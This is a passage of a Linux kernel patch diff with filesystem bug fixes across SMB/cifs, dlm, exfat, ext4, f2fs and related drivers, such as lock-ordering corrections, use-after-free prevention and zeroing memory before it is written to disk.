+@@ -4097,9 +4136,7 @@ smb2_new_read_req(void **buf, unsigned int *total_len,
+ 	 * If we want to do a RDMA write, fill in and append
+ 	 * smbd_buffer_descriptor_v1 to the end of read request
+ 	 */
+-	if (server->rdma && rdata && !server->sign &&
+-		rdata->bytes >= server->smbd_conn->rdma_readwrite_threshold) {
+-
++	if (smb3_use_rdma_offload(io_parms)) {
+ 		struct smbd_buffer_descriptor_v1 *v1;
+ 		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+ 
+@@ -4495,10 +4532,27 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	struct kvec iov[1];
+ 	struct smb_rqst rqst = { };
+ 	unsigned int total_len;
++	struct cifs_io_parms _io_parms;
++	struct cifs_io_parms *io_parms = NULL;
+ 
+ 	if (!wdata->server)
+ 		server = wdata->server = cifs_pick_channel(tcon->ses);
+ 
++	/*
++	 * in future we may get cifs_io_parms passed in from the caller,
++	 * but for now we construct it here...
++	 */
++	_io_parms = (struct cifs_io_parms) {
++		.tcon = tcon,
++		.server = server,
++		.offset = wdata->offset,
++		.length = wdata->bytes,
++		.persistent_fid = wdata->cfile->fid.persistent_fid,
++		.volatile_fid = wdata->cfile->fid.volatile_fid,
++		.pid = wdata->pid,
++	};
++	io_parms = &_io_parms;
++
+ 	rc = smb2_plain_req_init(SMB2_WRITE, tcon, server,
+ 				 (void **) &req, &total_len);
+ 	if (rc)
+@@ -4508,28 +4562,31 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 		flags |= CIFS_TRANSFORM_REQ;
+ 
+ 	shdr = (struct smb2_hdr *)req;
+-	shdr->Id.SyncId.ProcessId = cpu_to_le32(wdata->cfile->pid);
++	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
+ 
+-	req->PersistentFileId = wdata->cfile->fid.persistent_fid;
+-	req->VolatileFileId = wdata->cfile->fid.volatile_fid;
++	req->PersistentFileId = io_parms->persistent_fid;
++	req->VolatileFileId = io_parms->volatile_fid;
+ 	req->WriteChannelInfoOffset = 0;
+ 	req->WriteChannelInfoLength = 0;
+ 	req->Channel = 0;
+-	req->Offset = cpu_to_le64(wdata->offset);
++	req->Offset = cpu_to_le64(io_parms->offset);
+ 	req->DataOffset = cpu_to_le16(
+ 				offsetof(struct smb2_write_req, Buffer));
+ 	req->RemainingBytes = 0;
+ 
+-	trace_smb3_write_enter(0 /* xid */, wdata->cfile->fid.persistent_fid,
+-		tcon->tid, tcon->ses->Suid, wdata->offset, wdata->bytes);
++	trace_smb3_write_enter(0 /* xid */,
++			       io_parms->persistent_fid,
++			       io_parms->tcon->tid,
++			       io_parms->tcon->ses->Suid,
++			       io_parms->offset,
++			       io_parms->length);
++
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 	/*
+ 	 * If we want to do a server RDMA read, fill in and append
+ 	 * smbd_buffer_descriptor_v1 to the end of write request
+ 	 */
+-	if (server->rdma && !server->sign && wdata->bytes >=
+-		server->smbd_conn->rdma_readwrite_threshold) {
+-
++	if (smb3_use_rdma_offload(io_parms)) {
+ 		struct smbd_buffer_descriptor_v1 *v1;
+ 		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+ 
+@@ -4581,14 +4638,14 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	}
+ #endif
+ 	cifs_dbg(FYI, "async write at %llu %u bytes\n",
+-		 wdata->offset, wdata->bytes);
++		 io_parms->offset, io_parms->length);
+ 
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 	/* For RDMA read, I/O size is in RemainingBytes not in Length */
+ 	if (!wdata->mr)
+-		req->Length = cpu_to_le32(wdata->bytes);
++		req->Length = cpu_to_le32(io_parms->length);
+ #else
+-	req->Length = cpu_to_le32(wdata->bytes);
++	req->Length = cpu_to_le32(io_parms->length);
+ #endif
+ 
+ 	if (wdata->credits.value > 0) {
+@@ -4596,7 +4653,7 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 						    SMB2_MAX_BUFFER_SIZE));
+ 		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
+ 
+-		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
++		rc = adjust_credits(server, &wdata->credits, io_parms->length);
+ 		if (rc)
+ 			goto async_writev_out;
+ 
+@@ -4609,9 +4666,12 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 
+ 	if (rc) {
+ 		trace_smb3_write_err(0 /* no xid */,
+-				     req->PersistentFileId,
+-				     tcon->tid, tcon->ses->Suid, wdata->offset,
+-				     wdata->bytes, rc);
++				     io_parms->persistent_fid,
++				     io_parms->tcon->tid,
++				     io_parms->tcon->ses->Suid,
++				     io_parms->offset,
++				     io_parms->length,
++				     rc);
+ 		kref_put(&wdata->refcount, release);
+ 		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
+ 	}
+diff --git a/fs/cifs/smbdirect.c b/fs/cifs/smbdirect.c
+index 8c816b25ce7c6..cf923f211c512 100644
+--- a/fs/cifs/smbdirect.c
++++ b/fs/cifs/smbdirect.c
+@@ -1700,6 +1700,7 @@ static struct smbd_connection *_smbd_get_connection(
+ 
+ allocate_mr_failed:
+ 	/* At this point, need to a full transport shutdown */
++	server->smbd_conn = info;
+ 	smbd_destroy(server);
+ 	return NULL;
+ 
+@@ -2217,6 +2218,7 @@ static int allocate_mr_list(struct smbd_connection *info)
+ 	atomic_set(&info->mr_ready_count, 0);
+ 	atomic_set(&info->mr_used_count, 0);
+ 	init_waitqueue_head(&info->wait_for_mr_cleanup);
++	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
+ 	/* Allocate more MRs (2x) than hardware responder_resources */
+ 	for (i = 0; i < info->responder_resources * 2; i++) {
+ 		smbdirect_mr = kzalloc(sizeof(*smbdirect_mr), GFP_KERNEL);
+@@ -2244,13 +2246,13 @@ static int allocate_mr_list(struct smbd_connection *info)
+ 		list_add_tail(&smbdirect_mr->list, &info->mr_list);
+ 		atomic_inc(&info->mr_ready_count);
+ 	}
+-	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
+ 	return 0;
+ 
+ out:
+ 	kfree(smbdirect_mr);
+ 
+ 	list_for_each_entry_safe(smbdirect_mr, tmp, &info->mr_list, list) {
++		list_del(&smbdirect_mr->list);
+ 		ib_dereg_mr(smbdirect_mr->mr);
+ 		kfree(smbdirect_mr->sgl);
+ 		kfree(smbdirect_mr);
+diff --git a/fs/coda/upcall.c b/fs/coda/upcall.c
+index 59f6cfd06f96a..cd6a3721f6f69 100644
+--- a/fs/coda/upcall.c
++++ b/fs/coda/upcall.c
+@@ -791,7 +791,7 @@ static int coda_upcall(struct venus_comm *vcp,
+ 	sig_req = kmalloc(sizeof(struct upc_req), GFP_KERNEL);
+ 	if (!sig_req) goto exit;
+ 
+-	sig_inputArgs = kvzalloc(sizeof(struct coda_in_hdr), GFP_KERNEL);
++	sig_inputArgs = kvzalloc(sizeof(*sig_inputArgs), GFP_KERNEL);
+ 	if (!sig_inputArgs) {
+ 		kfree(sig_req);
+ 		goto exit;
+diff --git a/fs/cramfs/inode.c b/fs/cramfs/inode.c
+index 61ccf7722fc3c..6dae27d6f553f 100644
+--- a/fs/cramfs/inode.c
++++ b/fs/cramfs/inode.c
+@@ -183,7 +183,7 @@ static void *cramfs_blkdev_read(struct super_block *sb, unsigned int offset,
+ 				unsigned int len)
+ {
+ 	struct address_space *mapping = sb->s_bdev->bd_inode->i_mapping;
+-	struct file_ra_state ra;
++	struct file_ra_state ra = {};
+ 	struct page *pages[BLKS_PER_BUF];
+ 	unsigned i, blocknr, buffer;
+ 	unsigned long devsize;
+diff --git a/fs/dlm/lockspace.c b/fs/dlm/lockspace.c
+index d0b4e2181a5f3..99bc96f907799 100644
+--- a/fs/dlm/lockspace.c
++++ b/fs/dlm/lockspace.c
+@@ -381,23 +381,23 @@ static int threads_start(void)
+ {
+ 	int error;
+ 
+-	error = dlm_scand_start();
++	/* Thread for sending/receiving messages for all lockspace's */
++	error = dlm_midcomms_start();
+ 	if (error) {
+-		log_print("cannot start dlm_scand thread %d", error);
++		log_print("cannot start dlm midcomms %d", error);
+ 		goto fail;
+ 	}
+ 
+-	/* Thread for sending/receiving messages for all lockspace's */
+-	error = dlm_midcomms_start();
++	error = dlm_scand_start();
+ 	if (error) {
+-		log_print("cannot start dlm midcomms %d", error);
+-		goto scand_fail;
++		log_print("cannot start dlm_scand thread %d", error);
++		goto midcomms_fail;
+ 	}
+ 
+ 	return 0;
+ 
+- scand_fail:
+-	dlm_scand_stop();
++ midcomms_fail:
++	dlm_midcomms_stop();
+  fail:
+ 	return error;
+ }
+diff --git a/fs/dlm/memory.c b/fs/dlm/memory.c
+index eb7a08641fcf5..cdbaa452fc05a 100644
+--- a/fs/dlm/memory.c
++++ b/fs/dlm/memory.c
+@@ -51,7 +51,7 @@ int __init dlm_memory_init(void)
+ 	cb_cache = kmem_cache_create("dlm_cb", sizeof(struct dlm_callback),
+ 				     __alignof__(struct dlm_callback), 0,
+ 				     NULL);
+-	if (!rsb_cache)
++	if (!cb_cache)
+ 		goto cb;
+ 
+ 	return 0;
+diff --git a/fs/dlm/midcomms.c b/fs/dlm/midcomms.c
+index fc015a6abe178..ecfb3beb0bb88 100644
+--- a/fs/dlm/midcomms.c
++++ b/fs/dlm/midcomms.c
+@@ -375,7 +375,7 @@ static int dlm_send_ack(int nodeid, uint32_t seq)
+ 	struct dlm_msg *msg;
+ 	char *ppc;
+ 
+-	msg = dlm_lowcomms_new_msg(nodeid, mb_len, GFP_NOFS, &ppc,
++	msg = dlm_lowcomms_new_msg(nodeid, mb_len, GFP_ATOMIC, &ppc,
+ 				   NULL, NULL);
+ 	if (!msg)
+ 		return -ENOMEM;
+@@ -402,10 +402,11 @@ static int dlm_send_fin(struct midcomms_node *node,
+ 	struct dlm_mhandle *mh;
+ 	char *ppc;
+ 
+-	mh = dlm_midcomms_get_mhandle(node->nodeid, mb_len, GFP_NOFS, &ppc);
++	mh = dlm_midcomms_get_mhandle(node->nodeid, mb_len, GFP_ATOMIC, &ppc);
+ 	if (!mh)
+ 		return -ENOMEM;
+ 
++	set_bit(DLM_NODE_FLAG_STOP_TX, &node->flags);
+ 	mh->ack_rcv = ack_rcv;
+ 
+ 	m_header = (struct dlm_header *)ppc;
+@@ -417,7 +418,6 @@ static int dlm_send_fin(struct midcomms_node *node,
+ 
+ 	pr_debug("sending fin msg to node %d\n", node->nodeid);
+ 	dlm_midcomms_commit_mhandle(mh, NULL, 0);
+-	set_bit(DLM_NODE_FLAG_STOP_TX, &node->flags);
+ 
+ 	return 0;
+ }
+@@ -498,15 +498,14 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 
+ 		switch (p->header.h_cmd) {
+ 		case DLM_FIN:
+-			/* send ack before fin */
+-			dlm_send_ack(node->nodeid, node->seq_next);
+-
+ 			spin_lock(&node->state_lock);
+ 			pr_debug("receive fin msg from node %d with state %s\n",
+ 				 node->nodeid, dlm_state_str(node->state));
+ 
+ 			switch (node->state) {
+ 			case DLM_ESTABLISHED:
++				dlm_send_ack(node->nodeid, node->seq_next);
++
+ 				node->state = DLM_CLOSE_WAIT;
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+@@ -518,16 +517,19 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 					node->state = DLM_LAST_ACK;
+ 					pr_debug("switch node %d to state %s case 1\n",
+ 						 node->nodeid, dlm_state_str(node->state));
+-					spin_unlock(&node->state_lock);
+-					goto send_fin;
++					set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
++					dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+ 				}
+ 				break;
+ 			case DLM_FIN_WAIT1:
++				dlm_send_ack(node->nodeid, node->seq_next);
+ 				node->state = DLM_CLOSING;
++				set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+ 				break;
+ 			case DLM_FIN_WAIT2:
++				dlm_send_ack(node->nodeid, node->seq_next);
+ 				midcomms_node_reset(node);
+ 				pr_debug("switch node %d to state %s\n",
+ 					 node->nodeid, dlm_state_str(node->state));
+@@ -544,8 +546,6 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 				return;
+ 			}
+ 			spin_unlock(&node->state_lock);
+-
+-			set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+ 			break;
+ 		default:
+ 			WARN_ON_ONCE(test_bit(DLM_NODE_FLAG_STOP_RX, &node->flags));
+@@ -564,12 +564,6 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 		log_print_ratelimited("ignore dlm msg because seq mismatch, seq: %u, expected: %u, nodeid: %d",
+ 				      seq, node->seq_next, node->nodeid);
+ 	}
+-
+-	return;
+-
+-send_fin:
+-	set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+-	dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+ }
+ 
+ static struct midcomms_node *
+@@ -1214,8 +1208,15 @@ void dlm_midcomms_commit_mhandle(struct dlm_mhandle *mh,
+ 		dlm_free_mhandle(mh);
+ 		break;
+ 	case DLM_VERSION_3_2:
++		/* held rcu read lock here, because we sending the
++		 * dlm message out, when we do that we could receive
++		 * an ack back which releases the mhandle and we
++		 * get a use after free.
++		 */
++		rcu_read_lock();
+ 		dlm_midcomms_commit_msg_3_2(mh, name, namelen);
+ 		srcu_read_unlock(&nodes_srcu, mh->idx);
++		rcu_read_unlock();
+ 		break;
+ 	default:
+ 		srcu_read_unlock(&nodes_srcu, mh->idx);
+@@ -1362,11 +1363,11 @@ void dlm_midcomms_remove_member(int nodeid)
+ 		case DLM_CLOSE_WAIT:
+ 			/* passive shutdown DLM_LAST_ACK case 2 */
+ 			node->state = DLM_LAST_ACK;
+-			spin_unlock(&node->state_lock);
+-
+ 			pr_debug("switch node %d to state %s case 2\n",
+ 				 node->nodeid, dlm_state_str(node->state));
+-			goto send_fin;
++			set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
++			dlm_send_fin(node, dlm_pas_fin_ack_rcv);
++			break;
+ 		case DLM_LAST_ACK:
+ 			/* probably receive fin caught it, do nothing */
+ 			break;
+@@ -1382,12 +1383,6 @@ void dlm_midcomms_remove_member(int nodeid)
+ 	spin_unlock(&node->state_lock);
+ 
+ 	srcu_read_unlock(&nodes_srcu, idx);
+-	return;
+-
+-send_fin:
+-	set_bit(DLM_NODE_FLAG_STOP_RX, &node->flags);
+-	dlm_send_fin(node, dlm_pas_fin_ack_rcv);
+-	srcu_read_unlock(&nodes_srcu, idx);
+ }
+ 
+ static void midcomms_node_release(struct rcu_head *rcu)
+@@ -1395,6 +1390,7 @@ static void midcomms_node_release(struct rcu_head *rcu)
+ 	struct midcomms_node *node = container_of(rcu, struct midcomms_node, rcu);
+ 
+ 	WARN_ON_ONCE(atomic_read(&node->send_queue_cnt));
++	dlm_send_queue_flush(node);
+ 	kfree(node);
+ }
+ 
+@@ -1418,6 +1414,7 @@ static void midcomms_shutdown(struct midcomms_node *node)
+ 		node->state = DLM_FIN_WAIT1;
+ 		pr_debug("switch node %d to state %s case 2\n",
+ 			 node->nodeid, dlm_state_str(node->state));
++		dlm_send_fin(node, dlm_act_fin_ack_rcv);
+ 		break;
+ 	case DLM_CLOSED:
+ 		/* we have what we want */
+@@ -1431,12 +1428,8 @@ static void midcomms_shutdown(struct midcomms_node *node)
+ 	}
+ 	spin_unlock(&node->state_lock);
+ 
+-	if (node->state == DLM_FIN_WAIT1) {
+-		dlm_send_fin(node, dlm_act_fin_ack_rcv);
+-
+-		if (DLM_DEBUG_FENCE_TERMINATION)
+-			msleep(5000);
+-	}
++	if (DLM_DEBUG_FENCE_TERMINATION)
++		msleep(5000);
+ 
+ 	/* wait for other side dlm + fin */
+ 	ret = wait_event_timeout(node->shutdown_wait,
+diff --git a/fs/erofs/fscache.c b/fs/erofs/fscache.c
+index 014e209623762..a7923d6661301 100644
+--- a/fs/erofs/fscache.c
++++ b/fs/erofs/fscache.c
+@@ -337,8 +337,8 @@ static void erofs_fscache_domain_put(struct erofs_domain *domain)
+ 			kern_unmount(erofs_pseudo_mnt);
+ 			erofs_pseudo_mnt = NULL;
+ 		}
+-		mutex_unlock(&erofs_domain_list_lock);
+ 		fscache_relinquish_volume(domain->volume, NULL, false);
++		mutex_unlock(&erofs_domain_list_lock);
+ 		kfree(domain->domain_id);
+ 		kfree(domain);
+ 		return;
+diff --git a/fs/exfat/dir.c b/fs/exfat/dir.c
+index 1dfa67f307f17..158427e8124e1 100644
+--- a/fs/exfat/dir.c
++++ b/fs/exfat/dir.c
+@@ -100,7 +100,7 @@ static int exfat_readdir(struct inode *inode, loff_t *cpos, struct exfat_dir_ent
+ 			clu.dir = ei->hint_bmap.clu;
+ 		}
+ 
+-		while (clu_offset > 0) {
++		while (clu_offset > 0 && clu.dir != EXFAT_EOF_CLUSTER) {
+ 			if (exfat_get_next_cluster(sb, &(clu.dir)))
+ 				return -EIO;
+ 
+@@ -234,10 +234,7 @@ static int exfat_iterate(struct file *file, struct dir_context *ctx)
+ 		fake_offset = 1;
+ 	}
+ 
+-	if (cpos & (DENTRY_SIZE - 1)) {
+-		err = -ENOENT;
+-		goto unlock;
+-	}
++	cpos = round_up(cpos, DENTRY_SIZE);
+ 
+ 	/* name buffer should be allocated before use */
+ 	err = exfat_alloc_namebuf(nb);
+diff --git a/fs/exfat/exfat_fs.h b/fs/exfat/exfat_fs.h
+index bc6d21d7c5adf..25a5df0fdfe01 100644
+--- a/fs/exfat/exfat_fs.h
++++ b/fs/exfat/exfat_fs.h
+@@ -50,7 +50,7 @@ enum {
+ #define ES_IDX_LAST_FILENAME(name_len)	\
+ 	(ES_IDX_FIRST_FILENAME + EXFAT_FILENAME_ENTRY_NUM(name_len) - 1)
+ 
+-#define DIR_DELETED		0xFFFF0321
++#define DIR_DELETED		0xFFFFFFF7
+ 
+ /* type values */
+ #define TYPE_UNUSED		0x0000
+diff --git a/fs/exfat/file.c b/fs/exfat/file.c
+index f5b29072775de..b33431c74c8af 100644
+--- a/fs/exfat/file.c
++++ b/fs/exfat/file.c
+@@ -209,8 +209,7 @@ void exfat_truncate(struct inode *inode)
+ 	if (err)
+ 		goto write_size;
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ write_size:
+ 	aligned_size = i_size_read(inode);
+ 	if (aligned_size & (blocksize - 1)) {
+diff --git a/fs/exfat/inode.c b/fs/exfat/inode.c
+index 5b644cb057fa8..481dd338f2b8e 100644
+--- a/fs/exfat/inode.c
++++ b/fs/exfat/inode.c
+@@ -220,8 +220,7 @@ static int exfat_map_cluster(struct inode *inode, unsigned int clu_offset,
+ 		num_clusters += num_to_be_allocated;
+ 		*clu = new_clu.dir;
+ 
+-		inode->i_blocks +=
+-			num_to_be_allocated << sbi->sect_per_clus_bits;
++		inode->i_blocks += EXFAT_CLU_TO_B(num_to_be_allocated, sbi) >> 9;
+ 
+ 		/*
+ 		 * Move *clu pointer along FAT chains (hole care) because the
+@@ -576,8 +575,7 @@ static int exfat_fill_inode(struct inode *inode, struct exfat_dir_entry *info)
+ 
+ 	exfat_save_attr(inode, info->attr);
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ 	inode->i_mtime = info->mtime;
+ 	inode->i_ctime = info->mtime;
+ 	ei->i_crtime = info->crtime;
+diff --git a/fs/exfat/namei.c b/fs/exfat/namei.c
+index 5f995eba5dbbe..7442fead02793 100644
+--- a/fs/exfat/namei.c
++++ b/fs/exfat/namei.c
+@@ -396,7 +396,7 @@ static int exfat_find_empty_entry(struct inode *inode,
+ 		ei->i_size_ondisk += sbi->cluster_size;
+ 		ei->i_size_aligned += sbi->cluster_size;
+ 		ei->flags = p_dir->flags;
+-		inode->i_blocks += 1 << sbi->sect_per_clus_bits;
++		inode->i_blocks += sbi->cluster_size >> 9;
+ 	}
+ 
+ 	return dentry;
+diff --git a/fs/exfat/super.c b/fs/exfat/super.c
+index 35f0305cd493c..8c32460e031e8 100644
+--- a/fs/exfat/super.c
++++ b/fs/exfat/super.c
+@@ -373,8 +373,7 @@ static int exfat_read_root(struct inode *inode)
+ 	inode->i_op = &exfat_dir_inode_operations;
+ 	inode->i_fop = &exfat_dir_operations;
+ 
+-	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >>
+-				inode->i_blkbits;
++	inode->i_blocks = round_up(i_size_read(inode), sbi->cluster_size) >> 9;
+ 	ei->i_pos = ((loff_t)sbi->root_dir << 32) | 0xffffffff;
+ 	ei->i_size_aligned = i_size_read(inode);
+ 	ei->i_size_ondisk = i_size_read(inode);
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index a2f04a3808db5..0c6b011a91b3f 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1438,6 +1438,13 @@ static struct inode *ext4_xattr_inode_create(handle_t *handle,
+ 	uid_t owner[2] = { i_uid_read(inode), i_gid_read(inode) };
+ 	int err;
+ 
++	if (inode->i_sb->s_root == NULL) {
++		ext4_warning(inode->i_sb,
++			     "refuse to create EA inode when umounting");
++		WARN_ON(1);
++		return ERR_PTR(-EINVAL);
++	}
++
+ 	/*
+ 	 * Let the next inode be the goal, so we try and allocate the EA inode
+ 	 * in the same group, or nearby one.
+@@ -2567,9 +2574,8 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ 	is = kzalloc(sizeof(struct ext4_xattr_ibody_find), GFP_NOFS);
+ 	bs = kzalloc(sizeof(struct ext4_xattr_block_find), GFP_NOFS);
+-	buffer = kvmalloc(value_size, GFP_NOFS);
+ 	b_entry_name = kmalloc(entry->e_name_len + 1, GFP_NOFS);
+-	if (!is || !bs || !buffer || !b_entry_name) {
++	if (!is || !bs || !b_entry_name) {
+ 		error = -ENOMEM;
+ 		goto out;
+ 	}
+@@ -2581,12 +2587,18 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ 	/* Save the entry name and the entry value */
+ 	if (entry->e_value_inum) {
++		buffer = kvmalloc(value_size, GFP_NOFS);
++		if (!buffer) {
++			error = -ENOMEM;
++			goto out;
++		}
++
+ 		error = ext4_xattr_inode_get(inode, entry, buffer, value_size);
+ 		if (error)
+ 			goto out;
+ 	} else {
+ 		size_t value_offs = le16_to_cpu(entry->e_value_offs);
+-		memcpy(buffer, (void *)IFIRST(header) + value_offs, value_size);
++		buffer = (void *)IFIRST(header) + value_offs;
+ 	}
+ 
+ 	memcpy(b_entry_name, entry->e_name, entry->e_name_len);
+@@ -2601,25 +2613,26 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 	if (error)
+ 		goto out;
+ 
+-	/* Remove the chosen entry from the inode */
+-	error = ext4_xattr_ibody_set(handle, inode, &i, is);
+-	if (error)
+-		goto out;
+-
+ 	i.value = buffer;
+ 	i.value_len = value_size;
+ 	error = ext4_xattr_block_find(inode, &i, bs);
+ 	if (error)
+ 		goto out;
+ 
+-	/* Add entry which was removed from the inode into the block */
++	/* Move ea entry from the inode into the block */
+ 	error = ext4_xattr_block_set(handle, inode, &i, bs);
+ 	if (error)
+ 		goto out;
+-	error = 0;
++
++	/* Remove the chosen entry from the inode */
++	i.value = NULL;
++	i.value_len = 0;
++	error = ext4_xattr_ibody_set(handle, inode, &i, is);
++
+ out:
+ 	kfree(b_entry_name);
+-	kvfree(buffer);
++	if (entry->e_value_inum && buffer)
++		kvfree(buffer);
+ 	if (is)
+ 		brelse(is->iloc.bh);
+ 	if (bs)
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 97e816590cd95..8cca566baf3ab 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -655,6 +655,9 @@ static void __f2fs_submit_merged_write(struct f2fs_sb_info *sbi,
+ 
+ 	f2fs_down_write(&io->io_rwsem);
+ 
++	if (!io->bio)
++		goto unlock_out;
++
+ 	/* change META to META_FLUSH in the checkpoint procedure */
+ 	if (type >= META_FLUSH) {
+ 		io->fio.type = META_FLUSH;
+@@ -663,6 +666,7 @@ static void __f2fs_submit_merged_write(struct f2fs_sb_info *sbi,
+ 			io->bio->bi_opf |= REQ_PREFLUSH | REQ_FUA;
+ 	}
+ 	__submit_merged_bio(io);
++unlock_out:
+ 	f2fs_up_write(&io->io_rwsem);
+ }
+ 
+@@ -741,7 +745,7 @@ int f2fs_submit_page_bio(struct f2fs_io_info *fio)
+ 	}
+ 
+ 	if (fio->io_wbc && !is_read_io(fio->op))
+-		wbc_account_cgroup_owner(fio->io_wbc, page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	inc_page_count(fio->sbi, is_read_io(fio->op) ?
+ 			__read_io_type(page) : WB_DATA_TYPE(fio->page));
+@@ -948,7 +952,7 @@ alloc_new:
+ 	}
+ 
+ 	if (fio->io_wbc)
+-		wbc_account_cgroup_owner(fio->io_wbc, page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	inc_page_count(fio->sbi, WB_DATA_TYPE(page));
+ 
+@@ -1022,7 +1026,7 @@ alloc_new:
+ 	}
+ 
+ 	if (fio->io_wbc)
+-		wbc_account_cgroup_owner(fio->io_wbc, bio_page, PAGE_SIZE);
++		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	io->last_block_in_bio = fio->new_blkaddr;
+ 
+diff --git a/fs/f2fs/inline.c b/fs/f2fs/inline.c
+index 21a495234ffd7..7e867dff681dc 100644
+--- a/fs/f2fs/inline.c
++++ b/fs/f2fs/inline.c
+@@ -422,18 +422,17 @@ static int f2fs_move_inline_dirents(struct inode *dir, struct page *ipage,
+ 
+ 	dentry_blk = page_address(page);
+ 
++	/*
++	 * Start by zeroing the full block, to ensure that all unused space is
++	 * zeroed and no uninitialized memory is leaked to disk.
++	 */
++	memset(dentry_blk, 0, F2FS_BLKSIZE);
++
+ 	make_dentry_ptr_inline(dir, &src, inline_dentry);
+ 	make_dentry_ptr_block(dir, &dst, dentry_blk);
+ 
+ 	/* copy data from inline dentry block to new dentry block */
+ 	memcpy(dst.bitmap, src.bitmap, src.nr_bitmap);
+-	memset(dst.bitmap + src.nr_bitmap, 0, dst.nr_bitmap - src.nr_bitmap);
+-	/*
+-	 * we do not need to zero out remainder part of dentry and filename
+-	 * field, since we have used bitmap for marking the usage status of
+-	 * them, besides, we can also ignore copying/zeroing reserved space
+-	 * of dentry block, because them haven't been used so far.
+-	 */
+ 	memcpy(dst.dentry, src.dentry, SIZE_OF_DIR_ENTRY * src.max);
+ 	memcpy(dst.filename, src.filename, src.max * F2FS_SLOT_LEN);
+ 
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index ff6cf66ed46b2..fb489f55fef3a 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -714,18 +714,19 @@ void f2fs_update_inode_page(struct inode *inode)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+ 	struct page *node_page;
++	int count = 0;
+ retry:
+ 	node_page = f2fs_get_node_page(sbi, inode->i_ino);
+ 	if (IS_ERR(node_page)) {
+ 		int err = PTR_ERR(node_page);
+ 
+-		if (err == -ENOMEM) {
+-			cond_resched();
++		/* The node block was truncated. */
++		if (err == -ENOENT)
++			return;
++
++		if (err == -ENOMEM || ++count <= DEFAULT_RETRY_IO_COUNT)
+ 			goto retry;
+-		} else if (err != -ENOENT) {
+-			f2fs_stop_checkpoint(sbi, false,
+-					STOP_CP_REASON_UPDATE_INODE);
+-		}
++		f2fs_stop_checkpoint(sbi, false, STOP_CP_REASON_UPDATE_INODE);
+ 		return;
+ 	}
+ 	f2fs_update_inode(inode, node_page);
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index ae3c4e5474efa..b019f63fd5403 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -262,19 +262,24 @@ static void __complete_revoke_list(struct inode *inode, struct list_head *head,
+ 					bool revoke)
+ {
+ 	struct revoke_entry *cur, *tmp;
++	pgoff_t start_index = 0;
+ 	bool truncate = is_inode_flag_set(inode, FI_ATOMIC_REPLACE);
+ 
+ 	list_for_each_entry_safe(cur, tmp, head, list) {
+-		if (revoke)
++		if (revoke) {
+ 			__replace_atomic_write_block(inode, cur->index,
+ 						cur->old_addr, NULL, true);
++		} else if (truncate) {
++			f2fs_truncate_hole(inode, start_index, cur->index);
++			start_index = cur->index + 1;
++		}
+ 
+ 		list_del(&cur->list);
+ 		kmem_cache_free(revoke_entry_slab, cur);
+ 	}
+ 
+ 	if (!revoke && truncate)
+-		f2fs_do_truncate_blocks(inode, 0, false);
++		f2fs_do_truncate_blocks(inode, start_index * PAGE_SIZE, false);
+ }
+ 
+ static int __f2fs_commit_atomic_write(struct inode *inode)
+diff --git a/fs/fuse/ioctl.c b/fs/fuse/ioctl.c
+index fcce94ace2c23..8ba1545e01f95 100644
+--- a/fs/fuse/ioctl.c
++++ b/fs/fuse/ioctl.c
+@@ -419,6 +419,12 @@ static struct fuse_file *fuse_priv_ioctl_prepare(struct inode *inode)
+ 	struct fuse_mount *fm = get_fuse_mount(inode);
